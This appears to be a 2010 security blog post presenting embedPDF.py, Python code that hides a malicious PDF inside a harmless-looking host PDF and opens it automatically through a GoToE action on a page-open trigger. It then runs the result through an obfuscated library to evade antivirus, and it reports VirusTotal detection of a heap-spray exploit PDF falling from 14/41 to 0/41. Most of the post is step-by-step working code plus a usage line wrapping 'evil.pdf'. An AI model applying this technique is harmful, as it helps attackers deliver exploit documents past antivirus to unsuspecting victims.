Generic PDF exploit hider. embedPDF.py and goodbye AV detection (01/2010) January 13, 2010

This post is about hiding an evil PDF into a saint PDF. The objective is to embed a pdf into another pdf, and make the reader parse the embedded one without user intervention. If we manage to do this we’ll be able to ‘filter’ the embedded file and hide it through some pdf encoding filters (flatedecode, crypt, etc), that way making it invisible from the outside. And at last, as we’ll be using miniPDF.py, we’ll pass everything through the (unfinished) obfuscated version of the miniPDF.py lib, here.



Hey! But, can we embed files into a PDF at all? Well as stated here …

PDS3200:2008::7.11.4 Embedded File Streams If a PDF file contains file specifications that refer to an external file and the PDF file is archived or transmitted, some provision should be made to make sure that the external references will remain valid. One way to do this is to arrange for copies of the external files to accompany the PDF file. Embedded file streams (PDF 1.3) address this problem by allowing the contents of referenced files to be embedded directly within the body of the PDF file. This makes the PDF file a self-contained unit that can be stored or transmitted as a single entity. (The embedded files are included purely for convenience and need not be directly processed by any conforming reader.)

.. YES we can. There are probably other ways to embed files, as in the relatively new PDF ‘collection’ thing, but that’s other story.

I) Embeed a PDF into a PDF

OK, let’s start! First thing we need is a clean PDF to hide. I needs to be one with a correct xref and with a clean overall file structure. So, for a start we hide a good pdf, then we’ll see how to embed a bad one. There is a clean minimalistic text displaying pdf generated in this post, the pdf here.

Now we need to construct the host pdf. We are not really interesting in putting anything here so let’s construct an empty pdf (mostly as done for the JS-to_PDF post, here).

As in the earlier post first we import the lib and create a PDFDoc object representing a document in memory …

from miniPDF import *

#The PDF document

doc= PDFDoc()

Prepare the Pages dictionary, wich is in charge of linking to the pages..

pages = PDFDict()

pages.add(‘Type’, PDFName(‘Pages’))

doc.add(pages)

Prepare the Catalog dictionary.

catalog = PDFDict()

catalog.add(‘Type’, PDFName(‘Catalog’))

catalog.add(‘Pages’, PDFRef(pages))

doc.add(catalog)

The Catalog dictionary is the main root object of the PDF…

doc.setRoot(catalog)

We don’t really need any content on our pdf hosting PDF.

We add an empty content for the dummy page,

contents = PDFStream(”)

doc.add(contents)

and the single dummy page. Check out we NEED to honnor the Parent linking to the Pages dictionary, otherwise our magic won’t work.

page = PDFDict()

page.add(‘Type’, PDFName(‘Page’))

page.add(‘Parent’, PDFRef(pages))

page.add(‘Contents’, PDFRef(contents)) #<- NEEDED!

doc.add(page)

And finally populate the pages dictionary.

#link the page to the pages list

pages.add(‘Kids’,PDFArray([PDFRef(page)]))

pages.add(‘Count’, PDFNum(1))

And with this ..

print doc

it renders the incomplete base PDF to the stdout. Something like this.

The incomplete pdf is here and the incomplete py, here. OK, we have an empty base pdf, now let’s ..

Insert an embedded file.

For this we need to

add the EmbeddedFile stream containing the actual embedded file data, build a FileSpec dictionary for it, construct the EmbeddedFiles list and put that under the global names list in the Catalog.

(1) To add the EmbeddedFile stream to the document do something like this.

Get the filename to hide form the parameters, and load its content to memory…

import sys

fileStr = file(sys.argv[1]).read()

Construct a EmbeddedFile Dictionary as stated in PDF3200:2008.1::7.11.4(Embedded File Streams)

ef = PDFStream(fileStr)

ef.add(‘Type’, PDFName(‘EmbeddedFile’))

ef.add(‘Subtype’,PDFName(‘application#2Fpdf’))

ef.add(‘Params’,PDFDict({‘Size’: PDFNum(len(fileStr)),

‘CheckSum’: PDFOctalString(md5.new(fileStr).digest())}) )

ef.add(‘DL’, ‘ %d ‘%len(fileStr))

Note that.. the ‘Type’, ‘SubType’ and ‘Params’ tags are not strictly necesary.

EXAMPLE: If we embeed a file containin only “AAAA” the resulting EmbeddedFile stream will look like…

N 0 obj << /Type /EmbeddedFile /Subtype /application#2Fpdf /DL 4 /Length 4 /Params << /CheckSum (\256\133\106\214\16707\241\363\323... /Size 5 >> >> stream AAAA endstream endobj

(2) Now we’ll construct the FileSpec dictionary for it.

As stated in the rather confusing PDF3200:2008.1::7.11.3(File Specification Dictionaries), a file specification dictionary for an embedded file will need to have this tags on it…

Key Type Value Type Name The type of PDF object that this dictionary describes; shall be Filespec for a file specification dictionary. F string A file specification string of the form described in PF3200:2008.1::7.11.2, “File Specification Strings,” EF dictionary A dictionary containing a subset of the keys F, UF, DOS, Mac, and Unix, corresponding to the entries by those names in the file specification dictionary. The value of each such key shall be an embedded file stream (see 7.11.4, “Embedded File Streams”) containing the corresponding file. If this entry is present, the Type entry is required and the file specification dictionary shall be indirectly referenced.

The F and UF entries should be used in place of the DOS, Mac, or Unix entries.

So, my version of the FileSpec dictionary follows.

We need a dictionary containing a subset of the keys F, UF, DOS, Mac, and Unix, corresponding to the entries by those names in the file specification dictionary. And then put that under the EF tag in the Filespec dictionary. Damn! This is confusing. Basically we need a dictionary that looks like this…

<< /F N 0 R >>

Where “N 0 R” refer to the embeddedFile Stream object. Here you have the code..

embeddedlst = PDFDict()

embeddedlst.add(‘F’,PDFRef(embedded))

Let’s construct the actual Filespec dictionary. Note that I’ve hardcoded the name to ‘file.pdf’ and that this should be revisited if we are trying to embed more than one file.

filespec = PDFDict()

filespec.add(‘Type’,PDFName(‘Filespec’))

filespec.add(‘F’,PDFString(‘file.pdf’))

filespec.add(‘EF’, embeddedlst)

doc.add(filespec)

Excelent!! We are getting closer to the ultimate PDF hider!! The Filespec dictionary will have this look ..

M 0 obj << /Type /Filespec /F (file.pdf) /EF << /F N 0 R >> >> endobj

(3) Now we need to build the EmbeddedFiles list.

That’s easy, just build a dictionary that has a Names tag. Then put an array of pairs mapping an utf-16 encoded name to the filespec dictionary. In few words it should be something like this…

<< /Names [<fffe610074007400610063006800> M 0 R] >>

… where <fffe610074007400610063006800> is the utf-16 PDFHexString of the string “attach” and “M 0 R” is a reference to the filespec dictionary.

names = PDFDict()

names.add(‘EmbeddedFiles’,namesToFiles)

And then just add the names dictionary to the document and reference it from the Catalog. And the code will be similar to this…

namesToFiles = PDFDict()

namesToFiles.add(‘Names’, PDFArray([PDFHexString(‘attach’.encode(‘utf-16’)),PDFRef(filespec)] ))

(4) And finally we put it under the global names list in the Catalog.

We create the Names dictionary and add it to the document…

names = PDFDict()

doc.add(names)

… then add the EmbeddedFiles entry as stated in PDF3200:1008.1::7.7.4(Name Dictionary). And finally link it from the Catalog.

names.add(‘EmbeddedFiles’,namesToFiles)

catalog.add(‘Names’, PDFRef(names))

WE HAVE EMBEDDED A FILE!!!

The yet incomplete PDF with an embedded file containing “AAAA” is demostrated here, an it actually have something under the ‘paper clip’, check it out …

II) Jump to the embedded PDF with GoToE

Now than we have added an embedded pdf to a pdf we’ll want to jump to it without user intervention and (why not) without javascript.

For this we’ll set up a GoToE action and link it to the OpenAction or some other trigger dictionary in the document.

An action dictionary defines the characteristics and behaviour of an action, and it is described in PDF3200:1008.1::12.6.2(Action Dictionaries).

Embedded go-to actions give a complete facility for linking between a file in a hierarchy of nested embedded files and another file in the same or different hierarchy. The GoToE action is described in PDF3200:1008.1::12.6.4.4(Embedded Go-To Actions), but basically they have this look…

<< /S /GoToE /T <</N <fffe610074007400610063006800> /R /C /NewWindow false >> /NewWindow false >>

…where the N tag refers to the utf-16 encoded name of the embedded file. The code for this action follows.

action = PDFDict()

action.add(‘S’,PDFName(‘GoToE’))

action.add(‘NewWindow’,PDFBool(False))

action.add(‘T’,PDFDict({‘N’: name, ‘R’: PDFName(‘C’), ‘NewWindow’: PDFBool(False)}))

doc.add(action)

Setting the NewWindow tag to True or False may change how the reader opens the hided file. Funny things may happen when run from inside a browser (!).

OK, all we have left is linking this action to some trigger that wouldn’t call the user attention.. well we have OpenAction but let’s try something a lil different now. Let’s put one of those AA trigger dictionaries to our single dummy page on the host pdf. That’s done with something like this…

page.add(‘AA’,PDFDict({‘O’: PDFRef(action)}))

And finally render it out to stdout…

print doc #:)

And as we expect the pdf to hide in hte parameters.. we can use it like this…



python embeddPDF.pdf evil.pdf > goodness.pdf



For a quick look on a representative sample of this code check here.

III) The virustotal.com test

It’s time for the virustotal.com test. I’ll try to hide the evilness of some PDF embedding it into one of our hosts PDF, as described previously, and see what happens.

I’m tired so I’ll pick one not-so-evil pdf I got from my previous post. So I got this pdf which is a small pdf with a javascrip openaction featuring an obcene heap spray usually easily detected by AVs. That gave this result on virustotal.com, a 14 over 41 score.

Now lets embed it by our embeddPDF.py… I got this pdf. And when pass it to virustotal.com it got detected by 2 of 41 AVs. Here you have the result. Damn! 0 out of 41 seems to be hard to get. Let’s try it again but this time using the obfuscated miniPDF.py version piled on the embeddPDF.py. I got this pdf. I passed it to virustotal… and got

-danger- !! 0/41 !! -danger-



No AV have detected it!!

I suppose there are 1mill ways to accomplish this but it still feels g00d! The results here.

A complete test bundle with most of the code is here.

f/



UPDATE(5:19 AM Jan 17th) ::

Nice! We had an improvement! Now detected in 3/41 AVs. http://bit.ly/8Xabw4.